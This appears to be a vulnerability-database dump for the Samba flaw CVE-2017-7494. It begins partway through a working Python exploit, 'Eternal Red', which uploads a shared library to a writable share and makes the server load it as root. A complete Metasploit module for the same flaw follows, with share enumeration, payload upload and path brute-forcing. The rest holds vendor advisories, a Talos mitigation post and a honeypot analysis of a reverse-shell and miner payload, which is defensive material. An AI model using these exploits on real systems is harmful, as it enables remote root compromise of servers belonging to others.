kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n\r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n\r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, 
**kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n\r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n\r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n\r\n conn = SMBConnectionEx(user, password, \"\", \"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n\r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n\r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n\r\n return None\r\n\r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n\r\n return True\r\n\r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n\r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n\r\n print(\"[+] Attempting to 
load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n\r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n\r\n return\r\n\r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n\r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n\r\n if share is None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n\r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n\r\n conn.close()\r\n\r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n\r\n For local exploit provide the full path to your shared library to load\r\n\r\n Your shared library should look something like this\r\n\r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", 
type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.payload):\r\n print(\"[!] Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n\r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n\r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n\r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n\r\n load_payload(user, password, args.server, port, fullpath)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42060/"}, {"lastseen": "2017-05-30T11:49:14", "description": "Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit). CVE-2017-7494. Remote exploit for Linux platform. 
Tags: Metasploit Framework", "published": "2017-05-29T00:00:00", "type": "exploitdb", "title": "Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-29T00:00:00", "id": "EDB-ID:42084", "href": "https://www.exploit-db.com/exploits/42084/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::DCERPC\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\r\n 'Description' => %q{\r\n This module triggers an arbitrary shared library load vulnerability\r\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\r\n requires valid credentials, a writeable folder in an accessible share,\r\n and knowledge of the server-side path of the writeable folder. 
In\r\n some cases, anonymous access combined with common filesystem locations\r\n can be used to automatically exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery\r\n 'hdm', # Metasploit Module\r\n 'Brendan Coles <bcoles[at]gmail.com>', # Check logic\r\n 'Tavis Ormandy <taviso[at]google.com>', # PID hunting technique\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-7494' ],\r\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 9000,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'linux',\r\n #\r\n # Targets are currently limited by platforms with ELF-SO payload wrappers\r\n #\r\n 'Targets' =>\r\n [\r\n\r\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\r\n #\r\n # Not ready yet\r\n # [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\r\n # [ 'Linux MIPS', { 'Arch' => MIPS } ],\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Mar 24 2017',\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\r\n OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),\r\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('BruteforcePID', [false, 'Attempt to use two connections to bruteforce the PID working directory', false]),\r\n ])\r\n end\r\n\r\n\r\n def generate_common_locations\r\n candidates = []\r\n if datastore['SMB_SHARE_BASE'].to_s.length > 0\r\n candidates << datastore['SMB_SHARE_BASE']\r\n end\r\n\r\n %W{ /volume1 /volume2 /volume3 /volume4\r\n /shared /mnt /mnt/usb /media /mnt/media\r\n /var/samba /tmp /home /home/shared\r\n }.each do |base_name|\r\n candidates << base_name\r\n 
candidates << [base_name, @share]\r\n candidates << [base_name, @share.downcase]\r\n candidates << [base_name, @share.upcase]\r\n candidates << [base_name, @share.capitalize]\r\n candidates << [base_name, @share.gsub(\" \", \"_\")]\r\n end\r\n\r\n candidates.uniq\r\n end\r\n\r\n def enumerate_directories(share)\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n stuff = self.simple.client.find_first(\"\\\\*\")\r\n directories = [\"\"]\r\n stuff.each_pair do |entry,entry_attr|\r\n next if %W{. ..}.include?(entry)\r\n next unless entry_attr['type'] == 'D'\r\n directories << entry\r\n end\r\n\r\n return directories\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Enum #{share}: #{e}\")\r\n return nil\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n end\r\n end\r\n end\r\n\r\n def verify_writeable_directory(share, directory=\"\")\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n\r\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\r\n filename = directory.length == 0 ? 
\"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\r\n\r\n wfd = simple.open(filename, 'rwct')\r\n wfd << Rex::Text.rand_text_alpha(8)\r\n wfd.close\r\n\r\n simple.delete(filename)\r\n return true\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Write #{share}#{filename}: #{e}\")\r\n return false\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\r\n end\r\n end\r\n end\r\n\r\n def share_type(val)\r\n [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]\r\n end\r\n\r\n def enumerate_shares_lanman\r\n shares = []\r\n begin\r\n res = self.simple.client.trans(\r\n \"\\\\PIPE\\\\LANMAN\",\r\n (\r\n [0x00].pack('v') +\r\n \"WrLeh\\x00\" +\r\n \"B13BWz\\x00\" +\r\n [0x01, 65406].pack(\"vv\")\r\n ))\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Could not enumerate shares via LANMAN\")\r\n return []\r\n end\r\n if res.nil?\r\n vprint_error(\"Could not enumerate shares via LANMAN\")\r\n return []\r\n end\r\n\r\n lerror, lconv, lentries, lcount = res['Payload'].to_s[\r\n res['Payload'].v['ParamOffset'],\r\n res['Payload'].v['ParamCount']\r\n ].unpack(\"v4\")\r\n\r\n data = res['Payload'].to_s[\r\n res['Payload'].v['DataOffset'],\r\n res['Payload'].v['DataCount']\r\n ]\r\n\r\n 0.upto(lentries - 1) do |i|\r\n sname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\")\r\n stype = data[(i * 20) + 14, 2].unpack('v')[0]\r\n scoff = data[(i * 20) + 16, 2].unpack('v')[0]\r\n scoff -= lconv if lconv != 0\r\n scomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\")\r\n shares << [ sname, share_type(stype), scomm]\r\n end\r\n\r\n shares\r\n end\r\n\r\n def probe_module_path(path, simple_client=self.simple)\r\n begin\r\n simple_client.create_pipe(path)\r\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n vprint_error(\"Probe: #{path}: #{e}\")\r\n end\r\n end\r\n\r\n def find_writeable_path(share)\r\n 
subdirs = enumerate_directories(share)\r\n return unless subdirs\r\n\r\n if datastore['SMB_FOLDER'].to_s.length > 0\r\n subdirs.unshift(datastore['SMB_FOLDER'])\r\n end\r\n\r\n subdirs.each do |subdir|\r\n next unless verify_writeable_directory(share, subdir)\r\n return subdir\r\n end\r\n\r\n nil\r\n end\r\n\r\n def find_writeable_share_path\r\n @path = nil\r\n share_info = enumerate_shares_lanman\r\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\r\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\r\n end\r\n\r\n share_info.each do |share|\r\n next if share.first.upcase == 'IPC$'\r\n found = find_writeable_path(share.first)\r\n next unless found\r\n @share = share.first\r\n @path = found\r\n break\r\n end\r\n end\r\n\r\n def find_writeable\r\n find_writeable_share_path\r\n unless @share && @path\r\n print_error(\"No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\r\n fail_with(Failure::NoTarget, \"No matching target\")\r\n end\r\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\r\n end\r\n\r\n def upload_payload\r\n begin\r\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n\r\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\r\n filename = @path.length == 0 ? 
\"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\r\n wfd = simple.open(filename, 'rwct')\r\n wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform,\r\n payload.encoded, \"elf-so\", {:arch => target.arch, :platform => target.platform}\r\n )\r\n wfd.close\r\n\r\n @payload_name = random_filename\r\n return true\r\n\r\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n print_error(\"Write #{@share}#{filename}: #{e}\")\r\n return false\r\n\r\n ensure\r\n if self.simple.shares[\"\\\\\\\\#{rhost}\\\\#{@share}\"]\r\n self.simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n end\r\n end\r\n end\r\n\r\n def find_payload\r\n\r\n # Reconnect to IPC$\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\IPC$\")\r\n\r\n # Look for common paths first, since they can be a lot quicker than hunting PIDs\r\n print_status(\"Hunting for payload using common path names: #{@payload_name} - //#{rhost}/#{@share}/#{@path}\")\r\n generate_common_locations.each do |location|\r\n target = [location, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\r\n print_status(\"Trying location #{target}...\")\r\n probe_module_path(target)\r\n end\r\n\r\n # Exit early if we already have a session\r\n return if session_created?\r\n\r\n return unless datastore['BruteforcePID']\r\n\r\n # XXX: This technique doesn't seem to work in practice, as both processes have setuid()d\r\n # to non-root, but their /proc/pid directories are still owned by root. Trying to\r\n # read the /proc/other-pid/cwd/target.so results in permission denied. 
There is a\r\n # good chance that this still works on some embedded systems and odd-ball Linux.\r\n\r\n # Use the PID hunting strategy devised by Tavis Ormandy\r\n print_status(\"Hunting for payload using PID search: #{@payload_name} - //#{rhost}/#{@share}/#{@path} (UNLIKELY TO WORK!)\")\r\n\r\n # Configure the main connection to have a working directory of the file share\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n\r\n # Use a second connection to brute force the PID of the first connection\r\n probe_conn = connect(false)\r\n smb_login(probe_conn)\r\n probe_conn.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n probe_conn.connect(\"\\\\\\\\#{rhost}\\\\IPC$\")\r\n\r\n # Run from 2 to MAX_PID (ushort) trying to read the other process CWD\r\n 2.upto(32768) do |pid|\r\n\r\n # Look for the PID associated with our main SMB connection\r\n target = [\"/proc/#{pid}/cwd\", @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\r\n vprint_status(\"Trying PID with target path #{target}...\")\r\n probe_module_path(target, probe_conn)\r\n\r\n # Keep our main connection alive\r\n if pid % 1000 == 0\r\n self.simple.client.find_first(\"\\\\*\")\r\n end\r\n end\r\n\r\n end\r\n\r\n def check\r\n res = smb_fingerprint\r\n\r\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\r\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\r\n return CheckCode::Safe\r\n end\r\n\r\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\r\n\r\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\r\n\r\n if samba_version < Gem::Version.new('3.5.0')\r\n return CheckCode::Safe\r\n end\r\n\r\n # Patched in 4.4.14\r\n if samba_version < Gem::Version.new('4.5.0') &&\r\n samba_version >= Gem::Version.new('4.4.14')\r\n return CheckCode::Safe\r\n end\r\n\r\n # Patched in 4.5.10\r\n if samba_version > Gem::Version.new('4.5.0') &&\r\n samba_version < Gem::Version.new('4.6.0') &&\r\n samba_version >= Gem::Version.new('4.5.10')\r\n return CheckCode::Safe\r\n 
end\r\n\r\n # Patched in 4.6.4\r\n if samba_version >= Gem::Version.new('4.6.4')\r\n return CheckCode::Safe\r\n end\r\n\r\n connect\r\n smb_login\r\n find_writeable_share_path\r\n disconnect\r\n\r\n if @share.to_s.length == 0\r\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\r\n return CheckCode::Detected\r\n end\r\n\r\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\r\n return CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n # Setup SMB\r\n connect\r\n smb_login\r\n\r\n # Find a writeable share\r\n find_writeable\r\n\r\n # Upload the shared library payload\r\n upload_payload\r\n\r\n # Find and execute the payload from the share\r\n begin\r\n find_payload\r\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply\r\n end\r\n\r\n # Cleanup the payload\r\n begin\r\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\r\n uploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\r\n simple.delete(uploaded_path)\r\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply\r\n end\r\n\r\n # Shutdown\r\n disconnect\r\n end\r\n\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42084/"}], "saint": [{"lastseen": "2019-05-29T19:19:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "edition": 2, "description": "Added: 06/08/2017 \nCVE: [CVE-2017-7494](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494>) \nBID: [98636](<http://www.securityfocus.com/bid/98636>) \n\n\n### Background\n\n[Samba](<http://www.samba.org>) is a software package which implements the SMB protocol on a variety of platforms, providing compatibility with Windows systems. \n\n### Problem\n\nA vulnerability in Samba allows a remote attacker to upload a shared object library to a writable share, and then cause the server to load and execute it. 
\n\n### Resolution\n\n[Upgrade](<https://www.samba.org/samba/download/>) to Samba 4.4.14, 4.5.10, or 4.6.4 or higher, or install an updated package from your Linux vendor. \n\n### References\n\n<https://www.samba.org/samba/security/CVE-2017-7494.html> \n\n\n### Limitations\n\nExploit works against Ubuntu 14.04 and requires the login and password of an account with write access to a Samba share on the target unless an anonymously writable share exists. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2017-06-08T00:00:00", "published": "2017-06-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/samba_shared_library_upload", "id": "SAINT:3579A721D51A069C725493EA48A26E42", "title": "Samba shared library upload and execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "\nThe samba project reports:\n\nRemote code execution from a writable share.\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\n\t code execution vulnerability, allowing a malicious client to upload\n\t a shared library to a writable share, and then cause the server to\n\t load and execute it.\n\n", "edition": 5, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/6f4d96c0-4062-11e7-b291-b499baebfeaf.html", "title": "samba -- remote code execution vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-06-30T15:02:29", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<h3>Overview</h3><div><div>Today, a new vulnerability affecting the widely used Samba software was disclosed. Samba is the implementation of the SMB/CIFS protocol commonly used in *NIX operating systems. 
<a href=\"https://www.samba.org/samba/security/CVE-2017-7494.html\">CVE-2017-7494</a> has the potential to impact many systems around the world. This vulnerability could allow a user to upload a shared library to a writeable share on a vulnerable Samba server and result in the server executing the uploaded file. This would allow an attacker to upload an exploit payload to a writeable Samba share, resulting in code execution on any server running an affected version of the Samba package. This currently affects all versions of Samba 3.5.0 (released March of 2010) and later. To emphasize the severity and low complexity: a metasploit one-liner can be used to trigger this vulnerability.</div><div><br /></div><div>A patch has already been released to address the issue. Additionally, there is a mitigation available within the configuration of Samba itself. Adding the parameter \"nt pipe support = no\" to the global section of the smb.conf file and restarting the service will also mitigate the threat. Because this setting prevents clients from accessing any named pipe endpoints, it can disable functionality that Windows clients expect, so treat it as a stopgap until the patch is applied. This threat is only beginning to be recognized by potential attackers with POC code having already been released on the Internet. It is only a matter of time before adversaries begin to use it more widely to compromise additional systems, both externally and internally. <a name='more'></a></div><div><br /></div><div>This is likely to affect numerous servers, storage devices such as NAS systems, and anything else running the version of Samba that is vulnerable to this attack. Users are urged to contact their vendor to obtain patched firmware or recommendations for addressing this threat. In the meantime the above workaround may help. In accordance with best practices, it is highly recommended that users do not allow direct SMB, Samba, CIFS, NFS, etc. 
access from the Internet to systems within their network.</div></div><h3>Coverage</h3><div><div>Snort Rule: 43002-43004</div><div><br /></div><div>Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.</div><div><br /></div><div>Additional ways our customers can detect and block this threat are listed below.</div><div><br /></div><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s1600/netsec-only.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"335\" src=\"https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s400/netsec-only.png\" width=\"400\" /></a></div><div>Advanced Malware Protection (<a href=\"https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html\">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.</div><div><br /></div><div><a href=\"https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html\">CWS</a> or <a href=\"https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html\">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.</div><div><br /></div><div>Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.</div><div><a 
href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\"><br /></a></div><div><a href=\"https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html\">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.</div><div><br /></div><div><a href=\"https://umbrella.cisco.com/\">Umbrella</a> prevents DNS resolution of the domains associated with malicious activity.</div><div><br /></div><div><a href=\"https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html\">Stealthwatch</a> detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.</div></div><div><br /></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=f_tPlpkE8BQ:UmkdzmxxjDE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/f_tPlpkE8BQ\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-05-25T03:31:37", "published": "2017-05-25T00:31:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/f_tPlpkE8BQ/samba-vuln-details.html", "id": "TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9", "title": "Samba Vulnerability: Dancing Its Way to a Network Near You", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:09:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3860-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 24, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : 
samba\nCVE ID : CVE-2017-7494\n\nsteelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.2.14+dfsg-0+deb8u6.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-05-24T07:35:17", "published": "2017-05-24T07:35:17", "id": "DEBIAN:DSA-3860-1:8B793", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00120.html", "title": "[SECURITY] [DSA 3860-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Package : samba\nVersion : 2:3.6.6-6+deb7u13\nCVE ID : CVE-2017-7494\n\nsteelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. 
A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n2:3.6.6-6+deb7u13.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-05-24T08:11:36", "published": "2017-05-24T08:11:36", "id": "DEBIAN:DLA-951-1:1BAA2", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201705/msg00022.html", "title": "[SECURITY] [DLA 951-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-06-30T15:02:31", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "\n\nNot long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue. The story was about a new vulnerability for *nix-based systems \u2013 EternalRed (aka SambaCry). This vulnerability (CVE-2017-7494) relates to all versions of [Samba](<https://en.wikipedia.org/wiki/Samba>), starting from 3.5.0, which was released in 2010, and was patched only in the latest versions of the package (4.6.4/4.5.10/4.4.14).\n\nOn May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and [WannaCry](<https://securelist.com/78411/wannacry-faq-what-you-need-to-know-today/>). Surprisingly, it was a cryptocurrency mining utility!\n\n## Vulnerability exploitation\n\nIn order to check that an unauthorized user has permissions to write to the network drive, the attackers first try to write a text file, consisting of 8 random symbols. 
If the attempt is successful they delete the file.\n\n[](<https://securelist.com/files/2017/06/sambacry_01.png>)\n\n_Writing and deleting the text file_\n\nAfter this check, it is time for the exploit's payload (it is assembled as a Samba plugin). After successful exploitation of the vulnerability, this runs with super-user privileges, although first the attackers have to guess the full path to the dropped file with their payload, starting from the root directory of the drive. We can see such attempts in the traffic captured on our honeypot. They are just brute-forcing the most obvious paths (specified in different manuals, etc.), where files can be stored on the drive.\n\n[](<https://securelist.com/files/2017/06/sambacry_02.png>)\n\n_Bruteforcing the path to the payload_\n\nAfter the path to the file is found, it can be loaded and executed in the context of the Samba-server process, using the SambaCry vulnerability. Afterwards the file is deleted in order to hide the traces. From this moment it exists and runs only in the virtual memory.\n\nIn our case two files were uploaded and executed in such a way: **INAebsGB.so** (349d84b3b176bbc9834230351ef3bc2a - Backdoor.Linux.Agent.an) and **cblRWuoCc.so** (2009af3fed2a4704c224694dfc4b31dc - Trojan-Downloader.Linux.EternalMiner.a).\n\n## INAebsGB.so\n\nThis file stores the simplest reverse-shell. It connects to the particular port of the IP-address specified by its owner, giving him remote access to the shell (/bin/sh). As a result, the attackers have an ability to execute remotely any shell-commands. 
